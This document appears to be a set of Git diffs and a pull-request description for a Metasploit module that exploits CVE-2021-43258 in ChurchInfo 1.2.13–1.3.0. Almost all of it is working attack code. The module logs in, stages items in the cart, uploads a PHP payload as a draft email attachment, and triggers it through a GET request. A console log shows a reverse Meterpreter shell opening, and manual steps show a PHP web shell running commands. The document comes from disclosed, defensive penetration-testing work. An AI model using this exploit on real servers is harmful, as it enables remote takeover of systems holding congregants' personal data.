+    # a valid login will give us a 302 redirect to TARGETURI + /CheckVersion.php so check that.
+    vprint_good("Location header is #{res.headers['Location']}")
+    unless res && res.code == 302 && res.headers['Location'] == datastore['TARGETURI'] + '/CheckVersion.php'
       fail_with(Failure::UnexpectedReply, "#{peer} - Check if credentials are correct (response code: #{res.code})")
     end
     print_good("Logged into application as #{datastore['USERNAME']}")
     vprint_status('Attempting exploit')
 
-    # We must establish items in the cart before we can sent the emails. This is a hard requirement server-side.
+    # We must add items to the cart before we can send the emails. This is a hard requirement server-side.
     print_status('Navigating to add items to cart')
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, datastore['APPBASE'], 'SelectList.php'),
+      'uri' => normalize_uri(target_uri.path, 'SelectList.php'),
       'method' => 'GET',
       'vars_get' => {
-        'Sort' => 'name',
-        'Filter' => '',
         'mode' => 'person',
-        'Letter' => '',
-        'Gender' => '',
-        'Classification' => '',
-        'FamilyRole' => '',
-        'PersonProperties' => '',
-        'grouptype' => '',
         'AddAllToCart' => 'Add+to+Cart'
-      },
-      'cookie' => cookie
+      }
     )
 
     # Need to check that items were successfully added to the cart
     # Here we're looking through html for the version string, similar to:
     # Items in Cart: 2
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to add items to cart via HTTP Response (response code: #{res.code})")
+    end
     /Items in Cart: (?<cart>\d)/ =~ res.body
     if cart.to_i < 1
-      print_error("Items in Cart: #{cart}")
+      print_error('No items in cart detected')
       fail_with(Failure::UnexpectedReply,
-                "Failure to add items to cart, #{cart} items were detected. Check if there are person entries in the application")
+                'Failure to add items to cart, no items were detected. Check if there are person entries in the application')
     end
     print_good("Items in Cart: #{cart}")
 
     # Uploading exploit as temporary email attachment
-    print_good('Uploading exploit via Email temp email attachment')
-    payload_name = rand_text_alpha(rand(5..14)) + '.php'
+    print_good('Uploading exploit via temp email attachment')
+    payload_name = Rex::Text.rand_text_alphanumeric(5..14) + '.php'
     vprint_status("Payload name is #{payload_name}")
 
     # Create the POST payload with required parameters to be parsed by the server
     post_data = Rex::MIME::Message.new
     post_data.add_part(payload.encoded, 'application/octet-stream', nil,
                        "form-data; name=\"Attach\"; filename=\"#{payload_name}\"")
-    vprint_status('Payload added to post_data')
     post_data.add_part(datastore['EMAIL_SUBJ'], '', nil, 'form-data; name="emailsubject"')
-    vprint_status('Subject added to post_data')
     post_data.add_part(datastore['EMAIL_MESG'], '', nil, 'form-data; name="emailmessage"')
-    vprint_status('emailmessage added to post_data')
     post_data.add_part('Save Email', '', nil, 'form-data; name="submit"')
-    vprint_status('submit added to post_data')
     file = post_data.to_s
     file.strip!
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, datastore['APPBASE'] + 'CartView.php'),
+      'uri' => normalize_uri(target_uri.path, 'CartView.php'),
       'method' => 'POST',
       'data' => file,
-      'cookie' => cookie,
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
     )
 
-    # Perform GET to PHP code uploaded as attachment and be interpreted by the server
-    exploit_uri = normalize_uri(target_uri.path, datastore['APPBASE'], 'tmp_attach', payload_name)
-    print_good("Exploit uploaded to #{exploit_uri}")
-    print_warning("Don't forget to clean up artifacts at #{exploit_uri}")
-    res = send_request_cgi({
-      'uri' => exploit_uri,
-      'method' => 'GET'
-    })
-
-    # If we don't get a 200, there must've been an error somewhere. Bummer :(
-    unless res && res.code == 200
-      fail_with(Exploit::Failure::Unknown, "#{peer} - Exploit failed, received HTTP " + res.code.to_s)
+    # Ensure that we get a 200 and the intended payload was
+    # successfully uploaded and attached to the draft email.
+    unless res.code == 200 && res.body.include?("Attach file:</b> #{payload_name}")
+      fail_with(Failure::Unknown, 'Failed to upload the payload.')
     end
+    print_good("Exploit uploaded to #{target_uri.path + 'tmp_attach/' + payload_name}")
+
+    # Have our payload deleted after we exploit
+    register_file_for_cleanup(payload_name)
+
+    # Make a GET request to the PHP file that was uploaded to execute it on the target server.
+    print_good('Executing payload with GET request')
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'tmp_attach', payload_name),
+      'method' => 'GET'
+    )
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end

--- a/modules/exploits/multi/http/churchinfo_upload_exec.rb
+++ b/modules/exploits/multi/http/churchinfo_upload_exec.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'ChurchInfo v1.2.13+ Authenticated RCE',
+        'Name' => 'ChurchInfo 1.2.13-1.3.0 Authenticated RCE',
         'Description' => %q{
           This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.
           By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the
@@ -197,7 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply,
                 'Failure to add items to cart, no items were detected. Check if there are person entries in the application')
     end
-    print_good("Items in Cart: #{cart}")
+    print_good("Items in Cart: #{cart_items}")
 
     # Uploading exploit as temporary email attachment
     print_good('Uploading exploit via temp email attachment')

--- a/modules/exploits/multi/http/churchinfo_upload_exec.rb
+++ b/modules/exploits/multi/http/churchinfo_upload_exec.rb
@@ -8,12 +8,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'ChurchInfo v.1.3.0 Authenticated RCE',
+        'Name' => 'ChurchInfo v1.2.13+ Authenticated RCE',
         'Description' => %q{
           This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.
           By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the
@@ -54,6 +55,64 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def check
+    if datastore['SSL'] == true
+      proto_var = 'https'
+    else
+      proto_var = 'http'
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'Default.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'Proto' => proto_var,
+        'Path' => target_uri.path
+      }
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to a request to its login page!')
+    end
+
+    # Check if page title is the one that ChurchInfo uses for its login page.
+    if res.body.match(%r{<title>ChurchInfo: Login</title>})
+      print_good('Target is ChurchInfo!')
+    else
+      return CheckCode::Safe('Target is not running ChurchInfo!')
+    end
+
+    # Check what version the target is running using the upgrade pages.
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_14To1_3_0.php'),
+      'method' => 'GET'
+    )
+
+    if res && (res.code == 500 || res.code == 200)
+      return CheckCode::Vulnerable('Target is running ChurchInfo 1.3.0!')
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_13To1_2_14.php'),
+      'method' => 'GET'
+    )
+
+    if res && (res.code == 500 || res.code == 200)
+      return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.14!')
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_12To1_2_13.php'),
+      'method' => 'GET'
+    )
+
+    if res && (res.code == 500 || res.code == 200)
+      return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.13!')
+    else
+      return CheckCode::Safe('Target is not running a vulnerable version of ChurchInfo!')
+    end
+  end
+
   #
   # The exploit method attempts a login, adds items to the cart, then creates the email attachment.
   # Adding items to the cart is required for the server-side code to accept the upload.
@@ -83,6 +142,11 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Unable to reach the ChurchInfo login page (response code: #{res.code})")
     end
 
+    # Check that we actually are targeting a ChurchInfo server.
+    unless res.body.match(%r{<title>ChurchInfo: Login</title>})
+      fail_with(Failure::NotVulnerable, 'Target is not a ChurchInfo!')
+    end
+
     # Grab our assigned session cookie
     cookie = res.get_cookies
     vprint_good("PHP session cookie is #{cookie}")
@@ -99,11 +163,11 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    # a valid login will give us a 302 redirect to TARGETURI + /CheckVersion.php so check that.
-    vprint_good("Location header is #{res.headers['Location']}")
+    # A valid login will give us a 302 redirect to TARGETURI + /CheckVersion.php so check that.
     unless res && res.code == 302 && res.headers['Location'] == datastore['TARGETURI'] + '/CheckVersion.php'
       fail_with(Failure::UnexpectedReply, "#{peer} - Check if credentials are correct (response code: #{res.code})")
     end
+    vprint_good("Location header is #{res.headers['Location']}")
     print_good("Logged into application as #{datastore['USERNAME']}")
     vprint_status('Attempting exploit')
 
@@ -122,10 +186,13 @@ class MetasploitModule < Msf::Exploit::Remote
     # Here we're looking through html for the version string, similar to:
     # Items in Cart: 2
     unless res && res.code == 200
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to add items to cart via HTTP Response (response code: #{res.code})")
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to add items to cart via HTTP GET request to SelectList.php (response code: #{res.code})")
     end
-    /Items in Cart: (?<cart>\d)/ =~ res.body
-    if cart.to_i < 1
+    cart_items = res.body.match(/Items in Cart: (?<cart>\d)/)
+    unless cart_items
+      fail_with(Failure::UnexpectedReply, "#{peer} - Server did not respond with the text 'Items in Cart'. Is this a ChurchInfo server?")
+    end
+    if cart_items['cart'].to_i < 1
       print_error('No items in cart detected')
       fail_with(Failure::UnexpectedReply,
                 'Failure to add items to cart, no items were detected. Check if there are person entries in the application')

--- a/modules/exploits/multi/http/churchinfo_upload_exec.rb
+++ b/modules/exploits/multi/http/churchinfo_upload_exec.rb
@@ -1,0 +1,183 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ChurchInfo v.1.3.0 Authenticated RCE Exploit CVE-2021-43258',
+        'Description' => %q{
+          This module exploits the email attachment upload staging from the CartView.php page. Uploading
+          a file as an attachment places it in the /tmp_attach/ folder before its submitted and can be
+          interpreted as PHP code by the server. This requires authentication to the application. This
+          vulnerability is assigned CVE-2021-43258.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'm4lwhere <m4lwhere@protonmail.com>' ],
+        'References' => [
+          ['URL', 'http://www.churchdb.org/'],
+          ['URL', 'http://sourceforge.net/projects/churchinfo/'],
+          ['CVE', '2021-43258']
+        ],
+        'Platform' => 'php',
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [['Automatic Targeting', { 'auto' => true }]],
+        'DisclosureDate' => '2021-10-30',
+        'DefaultTarget' => 0,
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_fs_delete_file
+            ]
+          }
+        },
+        'Notes' => {
+          'Stability' => ['CRASH_SAFE'],
+          'Reliability' => ['REPEATABLE_SESSION'],
+          'SideEffects' => ['ARTIFACTS_ON_DISK', 'IOC_IN_LOGS']
+        }
+      )
+    )
+    # Set the email subject and message if interested
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),
+        OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']),
+        OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Exploit Subj']),
+        OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Here\'s a lovely message'])
+      ]
+    )
+
+    self.needs_cleanup = true
+  end
+
+  #
+  # The exploit method attempts a login, adds items to the cart, then creates the email attachment.
+  # Adding items to the cart is required for the server-side code to accept the upload.
+  #
+
+  def exploit
+    # Need to gather cookie value first to pass to application
+    vprint_status('Gathering PHP session cookie')
+    if datastore['SSL'] == true
+      vprint_status('SSL is true, changing Proto parameter in URL')
+      login_page = datastore['APPBASE'] + 'Default.php?Proto=https&Path=' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '%2F' + datastore['APPBASE']
+    else
+      vprint_status('SSL is false, leaving Proto parameter as http')
+      login_page = datastore['APPBASE'] + 'Default.php?Proto=http&Path=' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '%2F' + datastore['APPBASE']
+    end
+    vprint_status("Login page is #{login_page}")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, login_page),
+      'method' => 'GET'
+    )
+
+    # Grab our assigned session cookie
+    cookie = res.get_cookies
+    vprint_good("PHP session cookie is #{cookie}")
+    vprint_status('Attempting login')
+
+    # Attempt a login with the cookie assigned, server will assign privs on server-side if authenticated
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, login_page),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'User' => datastore['USERNAME'],
+        'Password' => datastore['PASSWORD'],
+        'sURLPath' => login_page
+      }
+    )
+
+    # a valid login will give us a 302 redirect to CheckVersion.php so check that.
+    unless res && res.code == 302
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check if credentials are correct (response code: #{res.code})")
+    end
+    print_good("Logged into application as #{datastore['USERNAME']}")
+    vprint_status('Attempting exploit')
+
+    # We must establish items in the cart before we can sent the emails. This is a hard requirement server-side.
+    print_status('Navigating to add items to cart')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, datastore['APPBASE'], 'SelectList.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'Sort' => 'name',
+        'Filter' => '',
+        'mode' => 'person',
+        'Letter' => '',
+        'Gender' => '',
+        'Classification' => '',
+        'FamilyRole' => '',
+        'PersonProperties' => '',
+        'grouptype' => '',
+        'AddAllToCart' => 'Add+to+Cart'
+      },
+      'cookie' => cookie
+    )
+
+    # Need to check that items were successfully added to the cart
+    # Here we're looking through html for the version string, similar to:
+    # Items in Cart: 2
+    /Items in Cart: (?<cart>\d)/ =~ res.body
+    if cart.to_i < 1
+      print_error("Items in Cart: #{cart}")
+      fail_with(Failure::UnexpectedReply,
+                "Failure to add items to cart, #{cart} items were detected. Check if there are person entries in the application")
+    end
+    print_good("Items in Cart: #{cart}")
+
+    # Uploading exploit as temporary email attachment
+    print_good('Uploading exploit via Email temp email attachment')
+    payload_name = rand_text_alpha(rand(5..14)) + '.php'
+    vprint_status("Payload name is #{payload_name}")
+
+    # Create the POST payload with required parameters to be parsed by the server
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload.encoded, 'application/octet-stream', nil,
+                       "form-data; name=\"Attach\"; filename=\"#{payload_name}\"")
+    vprint_status('Payload added to post_data')
+    post_data.add_part(datastore['EMAIL_SUBJ'], '', nil, 'form-data; name="emailsubject"')
+    vprint_status('Subject added to post_data')
+    post_data.add_part(datastore['EMAIL_MESG'], '', nil, 'form-data; name="emailmessage"')
+    vprint_status('emailmessage added to post_data')
+    post_data.add_part('Save Email', '', nil, 'form-data; name="submit"')
+    vprint_status('submit added to post_data')
+    file = post_data.to_s
+    file.strip!
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, datastore['APPBASE'] + 'CartView.php'),
+      'method' => 'POST',
+      'data' => file,
+      'cookie' => cookie,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    # Perform GET to PHP code uploaded as attachment and be interpreted by the server
+    exploit_uri = normalize_uri(target_uri.path, datastore['APPBASE'], 'tmp_attach', payload_name)
+    print_good("Exploit uploaded to #{exploit_uri}")
+    print_warning("Don't forget to clean up artifacts at #{exploit_uri}")
+    res = send_request_cgi({
+      'uri' => exploit_uri,
+      'method' => 'GET'
+    })
+
+    # If we don't get a 200, there must've been an error somewhere. Bummer :(
+    unless res && res.code == 200
+      fail_with(Exploit::Failure::Unknown, "#{peer} - Exploit failed, received HTTP " + res.code.to_s)
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+end


### PR DESCRIPTION
ChurchInfo is a PHP application used to help Churches manage systems and users as an opensource project. There are various vulnerabilities in the ChurchInfo 1.3.0 software which can be exploited by an attacker, this module targets an authenticated remote code execution (RCE) vulnerability.

ChurchInfo 1.3.0 has functionality to email users from the database with attachments. When preparing the email, the attachment draft is saved in the `/churchinfo/tmp_attach/` folder. Before the email is sent, the file put into the attachment can be loaded in the application. RCE exists when uploading malicious PHP as an attachment.

This vulnerability was assigned CVE-2021-43258.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Within `msfconsole`, use the `exploits/multi/http/churchinfo_upload_exec` module.
- [ ] Set the target `RHOST`, `APPBASE`, `username`, and `password` values. 
- [ ] Tested and works properly against the application, this was reported to the ChurchInfo developers last year.
- [ ] This exploit only affects the PHP application to perform a Remote Code Execution.

## How it Works:
There is a draft email function within the application which allows users to upload attachments. Before the attachments are sent, they are stored in a directory named `/tmp_attach` as a direct file. This allows malicious PHP files to be uploaded and executed by the PHP engine used by the application.

Successful exploitation will appear with a similar output as below:
```
msf6 exploit(multi/http/churchinfo_upload_exec) > run

[*] Started reverse TCP handler on 192.168.1.240:4444
[+] Logged into application as admin
[*] Navigating to add items to cart
[+] Items in Cart: 3
[+] Uploading exploit via Email temp email attachment
[+] Exploit uploaded to /churchinfo/tmp_attach/FjuIxnXKe.php
[!] Don't forget to clean up artifacts at /churchinfo/tmp_attach/FjuIxnXKe.php
[*] Sending stage (39927 bytes) to 192.168.1.72
[*] Meterpreter session 2 opened (192.168.1.240:4444 -> 192.168.1.72:37250) at 2022-11-12 21:38:30 -0500

meterpreter >
```

### Manual Exploitation Steps:

1. Log into the ChurchInfo application 
2. Browse to the `SelectList.php` page and click the "Add to Cart" button
3. Browse to `CartView.php` and click "Compose Email"
4. Attach a PHP shell as the "attach file", place anything in the subject and message, click "Save Email"
5. Navigate to `http://127.0.0.1/churchinfo/tmp_attach/exploit.php?cmd=pwd`
6. Any PHP code is executed


Please let me know if any additional information is needed, I've read through the contribution documentation and believe that I've been able to meet all requirements.
